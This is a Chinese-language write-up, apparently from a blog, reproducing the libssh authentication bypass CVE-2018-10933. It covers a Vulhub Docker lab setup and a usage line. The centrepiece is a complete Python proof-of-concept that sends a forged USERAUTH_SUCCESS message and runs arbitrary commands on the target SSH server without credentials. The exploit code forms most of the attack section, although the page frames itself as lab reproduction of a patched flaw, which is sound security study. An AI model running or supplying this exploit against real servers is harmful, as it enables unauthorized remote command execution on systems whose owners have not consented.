libssh 服务端权限认证绕过 CVE-2018-10933 漏洞复现

libssh 服务端权限认证绕过 CVE-2018-10933 漏洞复现

  • 一、漏洞描述
  • 二、漏洞影响
  • 三、漏洞复现
    • 1、环境搭建
    • 2、漏洞复现
  • 四、漏洞POC
  • 五、参考链接

一、漏洞描述

libssh 是一个提供 SSH 相关接口的开源库,包含服务端、客户端等。其服务端代码中存在一处逻辑错误,攻击者可以在认证成功前发送MSG_USERAUTH_SUCCESS消息,绕过认证过程,未授权访问目标 SSH 服务器。

二、漏洞影响

libssh 0.6 及更高版本具有身份验证绕过漏洞。
libssh 版本 0.8.4 和 libssh 0.7.6 已发布,以解决此问题。

三、漏洞复现

1、环境搭建

使用 Vulhub 在服务器上搭建:

cd /vulhub/libssh/CVE-2018-10933
docker-compose up -d

其默认开放在2222端口,可以使用 SSH 连接,默认用户名:myuser,默认密码:mypassword
libssh 服务端权限认证绕过 CVE-2018-10933 漏洞复现_第1张图片

2、漏洞复现

因其正常连接需要输入密码,使用 EXP 向服务器显示SSH2_MSG_USERAUTH_SUCCESS消息
代替服务器等待的SSH2_MSG_USERAUTH_REQUEST消息,以达到无登录凭据认证:

python3 ssh_poc.py 1.1.1.1 2222 'whoami'

libssh 服务端权限认证绕过 CVE-2018-10933 漏洞复现_第2张图片

四、漏洞POC

#!/usr/bin/env python3
import sys
import paramiko
import socket
import logging

logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
bufsize = 2048


def execute(hostname, port, command):
    sock = socket.socket()
    try:
        sock.connect((hostname, int(port)))

        message = paramiko.message.Message()
        transport = paramiko.transport.Transport(sock)
        transport.start_client()

        message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
        transport._send_message(message)

        client = transport.open_session(timeout=10)
        client.exec_command(command)

        # stdin = client.makefile("wb", bufsize)
        stdout = client.makefile("rb", bufsize)
        stderr = client.makefile_stderr("rb", bufsize)

        output = stdout.read()
        error = stderr.read()

        stdout.close()
        stderr.close()

        return (output+error).decode()
    except paramiko.SSHException as e:
        logging.exception(e)
        logging.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
    except socket.error:
        logging.debug("Unable to connect.")

    return None


if __name__ == '__main__':
    print(execute(sys.argv[1], sys.argv[2], sys.argv[3]))

五、参考链接

https://www.libssh.org/security/advisories/CVE-2018-10933.txt
https://gist.github.com/0x4D31/35ddb0322530414bbb4c3288292749cc

你可能感兴趣的:(漏洞复现,CVE-2018-10933,libssh,libssh服务端权限认证绕过,安全,漏洞复现)